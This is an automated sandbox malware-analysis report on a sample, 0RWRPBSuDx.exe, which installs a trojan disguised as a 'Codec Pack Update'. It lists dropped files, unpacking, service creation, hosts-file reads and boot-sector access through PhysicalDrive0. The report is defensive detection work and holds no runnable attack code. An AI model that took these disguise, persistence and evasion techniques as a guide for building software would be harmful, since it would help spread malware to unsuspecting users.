        Source: is-MD4P1.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-MD4P1.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-K7UM1.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608850294.0000000002088000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 0RWRPBSuDx.exe
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608714441.0000000002300000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 0RWRPBSuDx.exe
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeSection loaded: netutils.dllJump to behavior
        Source: 0RWRPBSuDx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: codecpackupdate.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: WWAN_MobileFixup 2.33.197.66.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@7/26@1/2
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A008B8 FormatMessageA,GetLastError,3_2_00A008B8
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0040936C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00453D4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453D4C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00454574 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00454574
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateServiceA,CloseServiceHandle,2_2_00402572
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateServiceA,CloseServiceHandle,3_2_00402572
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00409AD0 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409AD0
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 2_2_00402345 StartServiceCtrlDispatcherA,2_2_00402345
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 2_2_00402345 StartServiceCtrlDispatcherA,2_2_00402345
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00402345 StartServiceCtrlDispatcherA,3_2_00402345
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack UpdateJump to behavior
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeFile created: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: 0RWRPBSuDx.exeVirustotal: Detection: 9%
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeFile read: C:\Users\user\Desktop\0RWRPBSuDx.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\0RWRPBSuDx.exe "C:\Users\user\Desktop\0RWRPBSuDx.exe"
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp "C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp" /SL5="$20420,1594531,54272,C:\Users\user\Desktop\0RWRPBSuDx.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -i
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -s
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp "C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp" /SL5="$20420,1594531,54272,C:\Users\user\Desktop\0RWRPBSuDx.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -iJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe "C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: 0RWRPBSuDx.exeStatic file information: File size 1954271 > 1048576

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeUnpacked PE file: 2.2.codecpackupdate.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_char3_:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeUnpacked PE file: 3.2.codecpackupdate.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_char3_:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeUnpacked PE file: 2.2.codecpackupdate.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeUnpacked PE file: 3.2.codecpackupdate.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00447DC0 LoadLibraryExA,LoadLibraryA,GetProcAddress,1_2_00447DC0
        Source: codecpackupdate.exe.1.drStatic PE information: section name: _char3_
        Source: is-K7UM1.tmp.1.drStatic PE information: section name: /4
        Source: is-K5GCJ.tmp.1.drStatic PE information: section name: /4
        Source: is-MU2B9.tmp.1.drStatic PE information: section name: /4
        Source: is-IQC7T.tmp.1.drStatic PE information: section name: /4
        Source: is-7NJT9.tmp.1.drStatic PE information: section name: /4
        Source: is-06H7C.tmp.1.drStatic PE information: section name: /4
        Source: WWAN_MobileFixup 2.33.197.66.exe.2.drStatic PE information: section name: _char3_
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00406518 push 00406555h; ret 0_2_0040654D
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00408028 push ecx; mov dword ptr [esp], eax0_2_0040802D
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00408E5C push 00408E8Fh; ret 0_2_00408E87
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004098B4 push 004098F1h; ret 1_2_004098E9
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0047E194 push 0047E272h; ret 1_2_0047E26A
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0045C1BC push ecx; mov dword ptr [esp], eax1_2_0045C1C1
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00410640 push ecx; mov dword ptr [esp], edx1_2_00410645
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0040A6C8 push esp; retf 1_2_0040A6D1
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00430700 push ecx; mov dword ptr [esp], eax1_2_00430705
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00412898 push 004128FBh; ret 1_2_004128F3
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00442CD4 push ecx; mov dword ptr [esp], ecx1_2_00442CD8
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00450C80 push 00450CB3h; ret 1_2_00450CAB
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00472D24 push ecx; mov dword ptr [esp], edx1_2_00472D25
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx1_2_0040CF9A
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx1_2_0040F4FA
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004576DC push 00457720h; ret 1_2_00457718
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0047F7E8 push ecx; mov dword ptr [esp], ecx1_2_0047F7ED
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00419B98 push ecx; mov dword ptr [esp], ecx1_2_00419B9D
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00455E70 push 00455EA8h; ret 1_2_00455EA0
        Source: codecpackupdate.exe.1.drStatic PE information: section name: .text entropy: 7.659657621272276
        Source: WWAN_MobileFixup 2.33.197.66.exe.2.drStatic PE information: section name: .text entropy: 7.659657621272276

        Persistence and Installation Behavior

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive02_2_00401A4F
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_009FF7D6
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\libbz2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\is-IQC7T.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\libvorbis-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\is-K7UM1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\is-K5GCJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeFile created: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\libogg-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\is-MD4P1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeFile created: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\is-MU2B9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\is-7NJT9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\is-06H7C.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile created: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeFile created: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exeJump to dropped file

        Boot Survival

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive02_2_00401A4F
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_009FF7D6
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 2_2_00402345 StartServiceCtrlDispatcherA,2_2_00402345
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B7C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B7C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus,1_2_0042414C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00424104 IsIconic,SetActiveWindow,1_2_00424104
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_004182F4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_004227CC
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00417508 IsIconic,GetCapture,1_2_00417508
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0047DB50 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0047DB50
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00417C40 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417C40
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00417C3E IsIconic,SetWindowPos,1_2_00417C3E
